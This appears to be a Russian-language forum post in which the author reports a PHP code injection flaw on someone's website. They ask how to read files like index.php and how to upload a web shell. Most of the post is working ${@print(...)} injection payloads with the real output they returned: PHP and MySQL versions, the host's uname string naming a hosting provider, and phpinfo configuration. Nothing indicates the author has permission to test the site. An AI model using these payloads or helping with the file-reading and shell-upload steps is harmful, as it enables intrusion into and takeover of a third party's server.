php-injection

В общем нашел сайт с уязвимостью php-injection (через POST) в поле

Как мне:

1) Вывести содержание какого-либо файла например index.php

2) Как залить shell?

Работают только подобные команды:

${@print(phpversion())} Результат: 4.4.9

${@print(php_uname())} Результат: FreeBSD fe45.hc.ru 8.2-RELEASE-p4 FreeBSD 8.2-RELEASE-p4 #0: Wed Oct 12 17:05:45 UTC 2011 root@tinderbox1.infra.hostcomm.ru:/usr/obj/i386/usr/src/sys/FE i386

${@print(mysql_get_client_info())} Результат: 4.1.25

${@print(mysql_get_server_info())} Результат: 4.1.25-log

${@print(mysql_list_dbs())} Результат: Resource id #612

${@print(phpinfo(INFO_GENERAL))} Результат (таблица) Configure Command './configure' '--enable-versioning' '--enable-memory-limit' '--with-layout=GNU' '--with-config-file-scan-dir=/usr/local/php4/etc/php' '--disable-all' '--program-prefix=' '--enable-discard-path' '--with-regex=php' '--enable-zend-multibyte' '--prefix=/usr/local/php4' '--mandir=/usr/local/php4/man' '--infodir=/usr/local/php4/info/' '--build=i386-portbld-freebsd8.2'

и т.д.